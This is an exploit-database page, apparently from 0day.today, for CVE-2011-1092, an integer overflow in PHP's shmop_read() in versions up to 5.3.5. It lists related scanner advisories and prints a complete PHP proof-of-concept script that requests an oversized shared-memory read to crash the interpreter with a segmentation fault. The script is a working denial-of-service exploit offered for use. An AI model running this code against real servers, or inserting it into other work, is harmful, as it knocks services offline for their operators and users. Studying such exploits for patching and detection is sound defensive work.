PHP <= 5.3.6 shmop_read() Integer Overflow DoS

🗓️ 13 Mar 2011 00:00:00Reported by Jose Carlos NorteType

zdt🔗 0day.today👁 29 Views

PHP <= 5.3.6 shmop_read() Integer Overflow DoS vulnerabilit

Reporter	Title	Published	Views	Family All 87
Tenable Nessus	PHP 5.3.x < 5.3.6 Multiple Vulnerabilities	18 Mar 201100:00	–	nessus
Tenable Nessus	PHP 5.3 < 5.3.6 String To Double Conversion DoS	18 Mar 201100:00	–	nessus
Tenable Nessus	Debian DSA-2408-1 : php5 - several vulnerabilities	14 Feb 201200:00	–	nessus
Tenable Nessus	Fedora 15 : maniadrive-1.2-29.fc15 / php-5.3.6-1.fc15 / php-eaccelerator-0.9.6.1-6.fc15 (2011-3614)	27 Mar 201100:00	–	nessus
Tenable Nessus	Fedora 14 : maniadrive-1.2-27.fc14 / php-5.3.6-1.fc14 / php-eaccelerator-0.9.6.1-6.fc14 (2011-3636)	7 Apr 201100:00	–	nessus
Tenable Nessus	Fedora 13 : maniadrive-1.2-27.fc13 / php-5.3.6-1.fc13 / php-eaccelerator-0.9.6.1-6.fc13 (2011-3666)	7 Apr 201100:00	–	nessus
Tenable Nessus	GLSA-201110-06 : PHP: Multiple vulnerabilities	12 Oct 201100:00	–	nessus
Tenable Nessus	Mac OS X Multiple Vulnerabilities (Security Update 2011-006)	13 Oct 201100:00	–	nessus
Tenable Nessus	Mandriva Linux Security Advisory : php (MDVSA-2011:052)	24 Mar 201100:00	–	nessus
Tenable Nessus	Mandriva Linux Security Advisory : php (MDVSA-2011:053)	24 Mar 201100:00	–	nessus

<?php
# Exploit Title: PHP <=5.3.5 Integer Overflow DoS
# Date: 12-03-11
# Author: Jose Carlos Norte - www.rooibo.com
# Software Link: www.php.net
# Version: <= 5.3.5
# Tested on: Ubuntu Linux
# CVE : CVE-2011-1092
 
$shm_key = ftok(__FILE__, 't');
$shm_id = shmop_open($shm_key, "c", 0644, 100);
$shm_data = shmop_read($shm_id, 1, 2147483647);
//if there is no segmentation fault past this point, we have 2gb of memory!
//or we are in a patched php
echo "this php version is not vulnerable!";
 
?>



#  0day.today [2018-02-02]  #

13 Mar 2011 00:00Current

7High risk

Vulners AI Score7

EPSS0.09998